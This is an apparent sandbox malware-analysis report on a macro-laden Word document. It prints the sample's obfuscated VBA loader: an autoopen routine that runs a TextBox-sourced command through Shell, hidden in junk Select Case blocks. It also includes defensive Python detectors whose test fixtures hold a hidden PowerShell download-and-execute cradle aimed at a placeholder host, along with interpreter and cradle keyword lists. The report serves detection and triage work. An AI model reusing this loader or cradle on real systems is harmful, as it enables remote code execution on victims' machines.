MALICIOUS (risk score 292)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. An 'autoopen' macro is present and calls into a function that invokes 'Shell()' (written as 'Interaction.Shell' with the call split across line continuations), indicating an attempt to execute arbitrary code as soon as the document is opened. The command string passed to Shell is assembled at run time from a form control (FvjGNhQUzwi.TextBox1) plus other variables, so it does not appear in the extracted macro source. Heuristics also flag 'cmd.exe' and 'PowerShell' strings in the file (neither appears in the macro source shown in the preview), suggesting the macro is designed to download and execute a second-stage payload.
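The behavioural side of that chain (T1204.002: the user opens the document; T1059.005: the macro's Shell call launches cmd.exe; T1059: cmd.exe launches PowerShell) is what an endpoint detection keys on. The script below is an added example written for this report, not the analyzer's logic and not telemetry from this sample: the process-creation records are constructed, the URL is a reserved example name, and the interpreter and flag lists are this example's own. It walks the parent chain rather than checking only the immediate parent, because `cmd /c powershell ...` puts cmd.exe, not the Office process, directly above PowerShell.

```python
"""Process-chain check for the execution path the report maps to T1204.002 and
T1059: an Office application spawning cmd.exe or PowerShell, directly or one
hop down (cmd /c powershell ...). Added example over constructed records; not
the analyzer's code and not telemetry from this sample."""

OFFICE = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe'}
INTERPRETERS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'rundll32.exe', 'regsvr32.exe'}
# Fragments that turn "an interpreter ran" into "an interpreter ran something":
# execution flags, encoded commands, download cradles. This example's own list.
EXEC_FLAGS = ('/c ', '/k ', '-enc', '-encodedcommand', 'iex', 'invoke-expression',
              'downloadstring', 'downloadfile', 'invoke-webrequest', 'windowstyle hidden',
              'bypass')

# Constructed Sysmon-style process-creation records. example.invalid is a reserved
# name; nothing here comes from the sandbox run of the sample.
CRADLE = ('powershell.exe -WindowStyle Hidden -NoProfile -Command '
          '"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/s\')"')
EVENTS = [
    {'pid': 100, 'ppid': 4, 'image': r'C:\Windows\explorer.exe', 'cmdline': 'explorer.exe'},
    {'pid': 2048, 'ppid': 100,
     'image': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'cmdline': 'WINWORD.EXE /n "C:\\Users\\user\\Downloads\\document.doc"'},
    {'pid': 2100, 'ppid': 2048, 'image': r'C:\Windows\System32\cmd.exe',
     'cmdline': 'cmd.exe /c ' + CRADLE},
    {'pid': 2130, 'ppid': 2100,
     'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', 'cmdline': CRADLE},
    # splwow64.exe is a legitimate Word child (print spooler helper): must not fire.
    {'pid': 2200, 'ppid': 2048, 'image': r'C:\Windows\splwow64.exe', 'cmdline': 'splwow64.exe 12288'},
    # A shell opened by the user from Explorer: no Office ancestor, must not fire.
    {'pid': 3000, 'ppid': 100, 'image': r'C:\Windows\System32\cmd.exe', 'cmdline': 'cmd.exe'},
]


def basename(path):
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def office_ancestor(event, by_pid, max_depth=4):
    """(office_pid, depth) for the nearest Office ancestor, else None. A rule that
    only looks at the immediate parent misses the PowerShell stage behind cmd /c.
    Real telemetry should key on ProcessGuid, since pids are reused."""
    cur = event
    for depth in range(1, max_depth + 1):
        parent = by_pid.get(cur['ppid'])
        if parent is None:
            return None
        if basename(parent['image']) in OFFICE:
            return parent['pid'], depth
        cur = parent
    return None


def office_spawned_interpreters(events):
    """Every interpreter with an Office ancestor, with the command-line fragments
    that justify raising it from 'medium' (interpreter ran) to 'high' (ran a payload)."""
    by_pid = {e['pid']: e for e in events}
    hits = []
    for e in events:
        if basename(e['image']) not in INTERPRETERS:
            continue
        anc = office_ancestor(e, by_pid)
        if anc is None:
            continue
        cmd = e['cmdline'].lower()
        flags = [f.strip() for f in EXEC_FLAGS if f in cmd]
        hits.append({'pid': e['pid'], 'image': basename(e['image']), 'office_pid': anc[0],
                     'depth': anc[1], 'flags': flags,
                     'severity': 'high' if flags else 'medium'})
    return hits


if __name__ == '__main__':
    for hit in office_spawned_interpreters(EVENTS):
        print(hit)
```

On the constructed batch this reports cmd.exe (depth 1) and powershell.exe (depth 2) under WINWORD.EXE, both at high severity, and ignores the spooler helper and the user-opened prompt. Feeding it a Sysmon Event ID 1 or EDR process-creation stream works the same way, provided the whole tree (not single events) is available for the parent walk.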
Heuristics (10)

- ClamAV: Doc.Malware.Generic-6782748-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Generic-6782748-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
  _ .Shell(XdUSCv, bCkvTwFz), fjLwJ) Set tIOqwjKWwsdIoPPibh = juFhibYjcPJwwnOWfj
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() NWNfj
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The "no modern VBA project was recovered" wording conflicts with the macro extraction below, which did recover the VBA source; treat this marker as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.)
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  http://www.iec.ch (in document text, OLE body)
  http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is a standard OOXML namespace URI, not a network indicator)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11854 bytes |

macros.bas
SHA-256: 6f8e6a2f19de1c5745061d0959b26ff0aa8db076bde1b6aeb9005e46bb4f9534
Detection (ClamAV, on the extracted artifact; the CLAMAV_DETECTION heuristic above is on the parent document): No threats found
Obfuscation or payload: likely. 317 of 372 identifiers look randomly generated (e.g. 'qjlYiFwXtZJWjOGZBYwrWFFo'), consistent with name-mangling obfuscation.
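The checks summarised above (AutoOpen entry point, Shell call, identifier-randomness ratio) and the junk pattern that fills the preview (Select Case blocks keyed on variables that are never assigned, wrapped around two real statements) can be reproduced on the olevba dump with a short script. The following is an added example written for this report, not the analyzer's code and not the sample's; it runs on a constructed excerpt that copies the preview's names and structure with the padding cut down to one block. Two assumptions are this example's own: the "looks random" rule (at least 8 characters with at least 4 upper/lower flips or under 20% vowels), and the dead-block rule, which relies on the macro running without Option Explicit (the preview declares nothing with Dim) so that an unassigned selector stays Empty and never matches a numeric Case label. Note also that Shell() and Interaction.Shell() are the same VBA function, and that after folding the continuation lines the one-hop data flow shows the command string coming from the form control FvjGNhQUzwi.TextBox1: the extracted .bas never contains the command itself, so the form stream has to be dumped separately.

```python
"""Static triage of an olevba macro dump, reproducing the report's checks
(auto-exec entry, Shell call, identifier-randomness ratio) and stripping the
dead Select Case padding. Added example; not the analyzer's or the sample's code."""
import re

# Constructed excerpt in the shape of macros.bas: names copied from the preview,
# junk cut down to a single block. Sample input for this example only.
SAMPLE_VBA = '''Attribute VB_Name = "FvjGNhQUzwi"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
NWNfj
End Sub
Function NWNfj()
On Error Resume Next
Select Case CTvsnfiFXCYVnCEMT
Case 120804152
nHVipmvljwIUqMYvVHEAjw = buddmhKhdJhhKjkGFsuCGOhh
Case 195258502
zcFViIzMlwQEtqjPK = ChrW(MmPdVBlrzLvSSSmOnnXTbuYl)
End Select
Const bCkvTwFz = 0
XdUSCv = FvjGNhQUzwi.TextBox1 + iHGXGD + UjvanMZh
kkZkrI = Array(DXNEkTT, hliDluU, Interaction _
_
.Shell(XdUSCv, bCkvTwFz), fjLwJ)
End Function
'''

AUTOEXEC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?Sub\s+(Auto_?Open|Auto_?Exec|'
                         r'Auto_?Close|Document_Open|Workbook_Open)\s*\(', re.I | re.M)
# Shell() / Interaction.Shell() plus the other usual launch paths.
EXEC_RE = re.compile(r'(?:\b(?:Shell|CreateObject|GetObject|CallByName)|\.(?:Run|Exec))\s*\(', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+|Const\s+|For\s+)?([A-Za-z_]\w*)\s*=')
IDENT_RE = re.compile(r'[A-Za-z_]\w*')
VBA_WORDS = set('attribute sub end function set select case const on error resume next '
                'array interaction shell chrw cbyte log dim as if then else for to step '
                'true false call option explicit private public nothing empty'.split())


def join_continuations(src):
    """Fold ' _' continuations (and bare '_' lines) into logical lines."""
    logical, buf = [], ''
    for line in (l.rstrip() for l in src.splitlines()):
        if line == '_' or line.endswith(' _'):
            buf += line[:-1]
        else:
            logical.append(buf + line)
            buf = ''
    return logical + ([buf] if buf else [])

def find_autoexec(src):
    return [m.group(1) for m in AUTOEXEC_RE.finditer(src)]

def find_exec_calls(lines):
    return [(i + 1, ln.strip()) for i, ln in enumerate(lines) if EXEC_RE.search(ln)]

def shell_arg_sources(lines):
    """One-hop data flow: the lines that assign the variable passed to Shell()."""
    out = []
    for _, ln in find_exec_calls(lines):
        m = re.search(r'\bShell\s*\(\s*([A-Za-z_]\w*)', ln, re.I)
        if m:
            pat = r'^\s*' + re.escape(m.group(1)) + r'\s*='
            out += [l.strip() for l in lines if re.match(pat, l)]
    return out

def looks_random(name):
    """This example's heuristic: long, with many case flips or almost no vowels."""
    if len(name) < 8:
        return False
    flips = sum(a.isalpha() and b.isalpha() and a.isupper() != b.isupper()
                for a, b in zip(name, name[1:]))
    return flips >= 4 or sum(c in 'aeiouAEIOU' for c in name) / len(name) < 0.2

def identifier_stats(src):
    """(random, total, names): the report's 'N of M identifiers look randomly generated'."""
    text = re.sub(r'"[^"\n]*"', '""', '\n'.join(join_continuations(src)))  # no string literals
    names = {n for n in IDENT_RE.findall(text) if n.lower() not in VBA_WORDS and not n.startswith('VB_')}
    rnd = sorted(n for n in names if looks_random(n))
    return len(rnd), len(names), rnd

def strip_dead_select_blocks(lines):
    """Drop 'Select Case <var>' blocks whose selector is never assigned (Empty never
    equals a numeric Case label). Conservative: any assignment anywhere keeps the block."""
    assigned = {m.group(1).lower() for m in map(ASSIGN_RE.match, lines) if m}
    out, i = [], 0
    while i < len(lines):
        m = re.match(r'^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$', lines[i], re.I)
        if m and m.group(1).lower() not in assigned:
            depth, i = 1, i + 1
            while i < len(lines) and depth:  # skip to the matching End Select
                depth += bool(re.match(r'^\s*Select\s+Case\b', lines[i], re.I))
                depth -= bool(re.match(r'^\s*End\s+Select\b', lines[i], re.I))
                i += 1
        else:
            out.append(lines[i])
            i += 1
    return out

if __name__ == '__main__':
    lines = join_continuations(SAMPLE_VBA)
    print(find_autoexec(SAMPLE_VBA), find_exec_calls(lines), shell_arg_sources(lines))
    print('%d of %d identifiers look random' % identifier_stats(SAMPLE_VBA)[:2])
    print('\n'.join(strip_dead_select_blocks(lines)))
```

On the excerpt the dead-block pass leaves the entry point, the Const, the string assembly from TextBox1 and the Shell call, which is the whole program. On the full dump the same pass removes every one of the Select Case blocks in the preview, since none of their selectors is assigned anywhere; the variables a selector would need (and the TextBox1 contents) live outside the VBA source, which is the caveat to keep in mind when triaging from olevba output alone.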
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "FvjGNhQUzwi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
NWNfj
End Sub
Attribute VB_Name = "IbTCQRfrKUWmlz"
Function NWNfj()
On Error Resume Next
Set cwiDdAtOQGCUKUfqmVVvsFwK = qzoCwnPjCwwBzZkOtwcUU
Select Case CTvsnfiFXCYVnCEMT
Case 120804152
nHVipmvljwIUqMYvVHEAjw = buddmhKhdJhhKjkGFsuCGOhh
OHjFOSDpLuoLJID = 145348705
fKJfOPkBzHpvpNMwU = abbOriswmwuwjqjoiXY
Case 195258502
rwEPKNtVjbPokduqRTfmQcoG = CByte(XwPAipXrYicXwj)
zcFViIzMlwQEtqjPK = ChrW(MmPdVBlrzLvSSSmOnnXTbuYl)
BOliApTSaltBVHDjnKnR = Log(jzRiDwrrVROdwTnAMw)
End Select
Set KPLPROGFwOGGdwNJmQiiiIh = UszuphtwRHOtLciwfNdc
Select Case JafoJbriaNBhhuYRMPQVH
Case 269245173
iUwKhkzRiFtLRSFjFC = ruMLiiJhTzNHdUFzU
RJwbwXcnjGzGiKTr = 325723743
VIUbXDjTRwPqMVlVnsR = zpjqwDiMOCnmWibLq
Case 276844901
vvcFiYsuiVNWaZhdfZddU = CByte(TFPKdThtZfzHWVVkFS)
IDrBfNMpBwmNMQa = ChrW(XpTuYMkvhYSDLIuUKWL)
cDjwRijwnSkqvtwvl = Log(hwTvTHvIisCRCqEJzTF)
End Select
Set pLTkdWVustmzsp = YfJVsBATtfJhHoErmA
Select Case wbauMrZtWkAFadjnDsNXzpr
Case 167952368
ToOFoBAwzstzlzd = IditajEaBBzZdtHjB
sDLnijAGakmpRvkErLJjik = 237160000
EmCbUFlKwvEZGUuztTIToL = DoZBvZVKITYivjZmVzctW
Case 281001674
zXRKmLcQwtDzmvEp = CByte(bkwGilwTUjmTMSNMibiiP)
zfCZpsjmrRKsRluEPlSrS = ChrW(pwmapmITZKUtlQDIwGmh)
VJTAbSaMsMYPVqGnOCuiXr = Log(XYAdAGpLFloTmSaNTiHjwwdP)
End Select
Set iNsRCPUEzMVTVz = SwbzCGjWWwuToMbKYEPhXIbS
Select Case oibVdKFfMwimwizzrVSIwf
Case 290048820
BwOGQYKVIJNYHAsoon = QwYbVRijmIKtJqFUhvzP
lJdnVZrqciTJCcZcUtoirY = 80398257
QEhBfLtpXpinuoAsqpKirkGO = rMCKhvNzfWQsqLQldlNz
Case 249848343
fswsBNhHfzSVozqfqtQqP = CByte(jAzittNwsQuJjJNpt)
PYrTZUXRuwvUhvTNIwsXUntj = ChrW(CbiTjRAzQaqaQbf)
czODYiwqSBRzWfc = Log(KNXsswNjuURVcnrVMPsn)
End Select
Set AXnNMovsDAOVSirjzuiM = DUWlBPjosBNOoovBDMdp
Select Case UGTMKdvSYminAzDQbKY
Case 78394255
LwBHiqvivhFWEi = DZrlnWTPianrskbB
dUIHSEjnzncEZR = 315646177
qMCTnYhrjShqzDuUj = skZFlVKwnirKJJ
Case 287287260
BXZiRFnQXzXpowtIYYZ = CByte(pkbhJokwAZIXzXBW)
wjmwJilzVJrojlkkfmRwsYc = ChrW(oQwqzqRuXNapmPjCpj)
itJRnYnTkkZBZGSHsjuzfs = Log(RVLuzQGPHJlzafwLSMWhJzMB)
End Select
Set WQXoRZzOBzTcBAaVWESV = JMiWAYLjEBSNlGwHUiLHYmCN
Select Case CPdcLcXViNEoSR
Case 7586257
iwwAOQtiNBZHOZWKURzJiD = YvsCtsSBNKTppFNplVzOJDQ
JqtUATsGiDXFWOA = 245502480
zLwujjEHcLnjpkViltCzwBt = NKmiHSXUNUJrTLZJp
Case 81953085
IEWpSBblVwmvwRihYuV = CByte(JnTVVbiLZTtKmc)
NqVUhjhCWbYKZpiBPTMPUl = ChrW(UrXQLBEcJWfQrD)
oUbkwtwQEVvSdqaNRco = Log(cJQWBRzOouYmzp)
End Select
Set oWUDoiTNacituRAAaJXnS = MsJXGVLzMprpoPoHw
Select Case pvkAiaCuXbkVQPPVKbtQYw
Case 14399579
PpBEdlMTKjzXiLNjVLzj = rYcZSEMNhSrtHlpZ
RmPRKjSsnzNKvMASQYQYfKjz = 34576014
OFdbaYJXuLUvjpKjfFzD = FrbqMYASGFPMiUMPMZoAYS
Case 266272049
VrbOwfbACqJOCkNAJEnFEiwV = CByte(RTjKCNmCdUVzmUaiOKrKwMbL)
rUfitmtFQjMuqzdXLZQsDW = ChrW(NbqYHLzFrUWKsHUjhbrVn)
jYKNmnmKTkVkRHCOm = Log(RbUaTolQqpiQLAwwrRNtYLS)
End Select
Const bCkvTwFz = 0
Set LidXFbKzEhrCBaG = BuEssBIKhvKJkczSivOoZFC
Select Case OZQaztCdWUJNAnOJW
Case 126691057
KRAOciZTFLRSvsodSliLnt = nQSlRujFSGQszOLosZZw
EBOVMKvYoHCQkNzJw = 53744798
ZGzMiAoPHwplNwOiPEQ = klhdwObOBOfvRAX
Case 75663739
ojVXuobwWoTWihF = CByte(ConZVOQYZOsRuUMZCdaU)
hpwFfcZHrWhZPOMjljaTwwj = ChrW(KECbuUAGklVwrUqmrRhrLrfF)
qQtABwjJAubZzN = Log(VaodsNsRtobiQpkTYw)
End Select
Set zJNpwJwIOnZAkfzVavohA = ojCzdMXavMurifTmD
Select Case ZzDDofuAlPTzLGhhUjnB
Case 208167104
korNGswUBorHICOlsXCda = GzAoJBKmwCBpMOL
YBDROfGEzfSioQwCJci = 301885804
RjvJOppFTqAaRwAZ = uarwqiicziEzjkf
Case 116816717
HSHIzqQwioSIXRzc = CByte(iHCQaFNjQGlGmG)
IDqiRAukbwMpQTaRGW = ChrW(BYPzjMubjjfrrizAUaOK)
nXbSOQzMqpikHEwsGKWWYLAv = Log(UHSTFqsLjNAoiSw)
End Select
Set wQXjpFEHuKUTVZzMiW = qGRzLGOwGVjqsNzRLiuhEPG
Select Case vVnCbuRtMfPMhTLdaIw
Case 251867511
TbFWImhopqbzrCpS = VMDqiNwmksSRGvRU
buhfTHjFWpnMqQWKO = 256383134
iUpOHjXuPXiuKfcavljBE = lHYKZubwGsIflulfaw
Case 314295304
UhoudhNpaZikjOji = CByte(zJdSSQqlitioPKjGrwDSdj)
jlWhJXwWKDpdnSuCRzIwofB = ChrW(OwipQjPMQRzhvjjN)
WXlahwozwmVVhDAkLTLt = Log(GiocMVVMGiRuTRIP)
End Select
Set CPTmLbXHdpqQUbDcIdMSEcIB = rSuUTmHARjdAoaii
Select Case JvEVIjVmNojHsaHR
Case 174923793
IdmKDiPCrZbTDdntSM = qjlYiFwXtZJWjOGZBYwrWFFo
KtkGTzHuUjkWEEEFKWdiDsFz = 29941133
VUVbldwcXLNRZaCcPiVCwU = mMibGsSomBhdnZswGabjsrs
Case 324251490
jbcabCqAaiPCBq = CByte(EXaQrwPDWjOcUnBvTlXaR)
NLzrcMqdvEkrbVQbFHRYGu = ChrW(ZVNYmvQiPTPJPRAT)
MskKsdMffrjQJt = Log(TwZVPoEiiaUXMLAKFoOLN)
End Select
Set dITYnSWIvPiKmFDnYSORK = lLKfOjtZmAVFSvHTm
Select Case nJKfRZqKIEAhJoa
Case 81608033
HOHEpPWciohnIfFjIiB = FukpDXpYEqhfFXA
iBwunCikJXAYvAB = 66168239
FRNdSARZwYsHBhkfACG = GTDMzfjWQdEpXGAFnbLA
Case 214719114
piqdHpQtuwuiSmOAim = CByte(uJUUCkvhfrZqFzmdZW)
YqGWjFusoNrmwYjmLU = ChrW(nsMIkBUHoifJpiHO)
nmlOHrHToFcSZNbIPidM = Log(VVOzGOIECIpKCwYivfAEp)
End Select
Set zApSKjMWKHTzvNzrtc = HchqMWUHjbBEWqNTau
Select Case tWqwzfibhJLuSQqYtSKcw
Case 280600878
cvIDwGhuYwLjwQfhLiv = wYhinfSUBQSlCwOBrblUzP
zHhuHNkwzBDaEOaQRoNtIi = 169427777
wCdqktanjmjaGlLGQRUj = YJnRLTfmWiSiAwFkuODaQqSi
Case 338384654
fdGcqKphZspYZavA = CByte(HRsFpFWWDQJihrJR)
oCftoIsTWMuVod = ChrW(PdKNGDpXkGmtjzsBjHXl)
VTTIAmTscAOmdSDjwLzwfvm = Log(PLTiLNOQsnuJrE)
End Select
XdUSCv = FvjGNhQUzwi.TextBox1 + iHGXGD + UjvanMZh + pSphOmwu + tprEhb + jiIInpqd + EaVcZLRz + sLMlAnkj + tTZLNIuf + qkTHqPCR
Set ASpiGCRLvlMnczXSzaXoaFsn = nwRicLHIYwonjF
Select Case sGNGbvKodlhXVV
Case 147877125
ZCcSEzhSaFiEAjfNVWvUrmLH = KnsvnlnBBOkHmwsZujWQ
otGUBwZCDnrUptL = 270306146
mTrCwUuFjZDvzGpqWW = lbmnNzzbsnzDjkWtCYEpZLO
Case 120123256
WHGjBdSXRDwzjiDBsCS = CByte(WWKaMnSSjUZNUOqsqvqJi)
PjatVuBnjJvjCAwjUOLA = ChrW(wijfRnKKzLJGqHizSRXQto)
RnMqwKabwipSCrOEH = Log(diwmaLtRjBzojzHORsFwOA)
End Select
Set aqnwZMXJXwFRiE = jWdzaOpHszEtDh
Select Case BVFWFAcTEwDojClhsu
Case 339757325
pjIupljvwUTTcDukMI = CECYBWaIFGQLwEMfUMLjURhU
fkMcHBVkvzQmHHYPcdoiJ = 135920396
QYZXAbikXhoWlOjzF = bDGvsNFmRrnsmaKVwDhdUIQ
Case 86477890
ESkmAwjjnhRIUfMROJnwivN = CByte(QRcPbaSmtBouVAQu)
IwssMbXVMGwdQOI = ChrW(YVjUQHNPfPTrRwN)
spVzVTDqEuPUUIdmjpwihaq = Log(ldNzIjDPsFkatK)
End Select
Set bYwszMKrjsQfzjnpV = WWHfLTHNtGCOjRV
Select Case aUWNrziTnQbDtco
Case 210701675
HnXKwNikmTEpSIz = rISSHRXrorusEUQR
HcizwiHsdFfadUIctC = 133911767
NwqPfWESmjRCmSLjUM = iLaiLrRKXmPKRwvJJlORZZo
Case 40244210
ndoLJbIjHqLmTiYOLhjWVAGq = CByte(BuFvVEWUiYOdzNKH)
KGkWpGqDOsHjbnWzBHhC = ChrW(mloSlGJlMUWOrpAGnMoPr)
MPkGksfzFdFtYUw = Log(EAjRBXlVkzWrOv)
End Select
Set ljqhfnFETZkvSHiv = fDJrwXjnLiITNSilC
Select Case GfHDXiMjTLbESwTwHFiVn
Case 55280938
uUEzlFHFJQWbPJb = iiSEYLHQLARKZCjzwZNj
hbaMGRnvVDmjZErVE = 223079270
NnlkozjGkZcqvsNwCrsSt = VpzidAwpburiWivqlO
Case 170839862
DWsMroLHodMPotSv = CByte(KTjIuzizQWiAMFdsiPwwkn)
oqAwibqcMzCbvtCIZKNaRc = ChrW(cYiXFdTzDXdrRuz)
XatWAJiiwjHZmW = Log(XMjYZzEkwsAzERCl)
End Select
Set zmfDzjWzEBiJio = jOFwmvCEPrspFcumkKJpn
Select Case uKsGMKZPAZApNVRLuFviQM
Case 42923693
RVKOzwVwvtTuFfisizrToPO = UZQDuEZiEzprzLSBEBu
BWFOWDEQUnFBHmuXiS = 28689009
TlqHprsThqOnUtWzUBjrAJ = RsojNQuSmzEBQjzZ
Case 205618496
kidYShNPzDhlMpJX = CByte(PBHfCnYcqQsGQWbBhPa)
sZGVzTqkAkOrtHhXXiivF = ChrW(cRVJjhFjfZjmjqumijwncFBB)
JoEiChfizzpAomJf = Log(EpIGarclwwzSTWPTw)
End Select
Set LcwoTuKXDsAJYJdbGJUj = iiukzzHYEQtBmfSfLpfF
Select Case rzwSIEVfXvLPDjwEEUz
Case 25626047
zbHIliLvuUpdDnivRrsltjVi = jwUbGViCarXrKXZJjcbWl
tTIndERFTGYWCf = 287394619
nwGbcvGDGUTcJDuMzi = ASTsikUYRSnUuRO
Case 269847942
PKXzMEjIlpvPLMWTZqBT = CByte(crHWolSzYKvORzp)
HoOnjtuZJGFRBUaN = ChrW(WmSPaXTNJMiAAtPhIS)
njWjwiNifBwDjh = Log(vKWvhQuaZjPYIMqksCYaozC)
End Select
Set fRmhiCzpYISzuGHjLBC = JzRJmsifLDDHDrZkZaWsHLpL
Select Case HTHQmuzLoPjAcuq
Case 132680151
dUFKvChXKlfJpwJFAf = aOZJDwPbsjwfjYniUFw
QatcIUBwRWubPStF = 25993857
COjaonNGzlBQpzCT = AVzAiuQKVpUPOfi
Case 198105349
DjfpmGOBVQwAhuZ = CByte(KsjGLTUPQSztrlFTmjwSnROP)
wNdTJovuSDmwXzkPQZTIV = ChrW(kKcOBwHJsiUXMGqv)
iCwYhTVOiMCXsuG = Log(odSrvnwnJKIdAldZ)
End Select
Set UKjXKYPqNABPIwALXfhOlVDa = biNSVCwUPWvbrMmcYjicm
Select Case HAfiutVKzHIoiuCYr
Case 326867274
vtbFkfTumNlVzw = XNnrHDzEXoSDisaz
kYrWfvuzbzizNlKrWWplApB = 312293112
ERRcoCMNukZEprSssjEQGK = ILIVkOruXwhbdd
Case 147336008
wWkSAlnhfXsIJwiitOJRjj = CByte(wDqCIHQoOVsHuWrBWYb)
NVilaRwhPTFHPulPKifZPj = ChrW(nQpkLCNmtFqOcUEcqJiZ)
QlszkbqosBbisvUkhmfChLB = Log(jJuFGpQjKjWizkbaWwA)
End Select
kkZkrI = Array(DXNEkTT, hliDluU, YpnzL, Interaction _
_
_
_
_
_
_
_
.Shell(XdUSCv, bCkvTwFz), fjLwJ)
Set tIOqwjKWwsdIoPPibh = juFhibYjcPJwwnOWfj
Select Case nsmXUvvMkwUKMbJqbo
Case 179662405
OZziGnvhVZskwGtbwWkli = nnHEwVmzmiDzGNsDR
AOqLDkLGhitEDpBzmLbB = 285385533
uYmKjzAjitFDlTYcjWt = nEDiiOzGbjcPpaURYtEMFB
Case 340467284
zADibKcFIAlpUEfSBtEBRpOK = CByte(HEqSjkmEDiiKPfQEXHooiwTN)
KMwziJltiTGlnbQzkQWBHl = ChrW(oztiZVUKkcfVYpHVY)
RjLKSjfYpufzMiZzIAobLXO = Log(VIHGsKdvzIpEDdi)
End Select
Set OhofzUbKVjfvrYJUtz = VvZZEintzvizmwKiEVrFr
Select Case KBIllwilonOiZXpHjzJabO
Case 287811652
tzjuEwCsphlYQSzrLNGrk = WnpwmuvQMvJYsmQ
jqkWpslQrRzSPOIAzlcsEI = 81622590
wYVqPraLaWjPGOS = BYEUudBzmIZGJXjYicZQ
Case 150490802
BzqorshtukTzrfDrNTXXEGSU = CByte(DmIldoBHFXEiGl)
QtOonLfEUmPGszr = ChrW(hWmnGZHQwRplIwMGhPHLrdhq)
inwOiIIObXIUwCqlwsV = Log(tvVaIZdsfEDovPXlIB)
End Select
Set jTkvEdRnJIkOAiKzwHzjGY = CkTOncMBqzwulsBZkW
Select Case FmlHpiRIPLfvfLwhKlOdL
Case 322415202
tRDnZEuhNJXTkRd = jWTzqKBRjpKroVtXIfrp
vsDUdRmHrLQjHiHrzQjPm = 22774566
uDssPzLFZnsldPcMtPKsd = KhnljIOIazrIJRlZWHjGqsP
Case 325296672
bXEqAcLGzsKFiTCqQNtt = CByte(GKbTtCLWDSSpHEkKSZ)
jBKZaUrodQZiVDHVMd = ChrW(HZzjvasPXORfwoWNUv)
AzBOiGinwlzjYhwSwhRPw = Log(EUZLlbqzqnabcXGLQdRnv)
End Select
End Function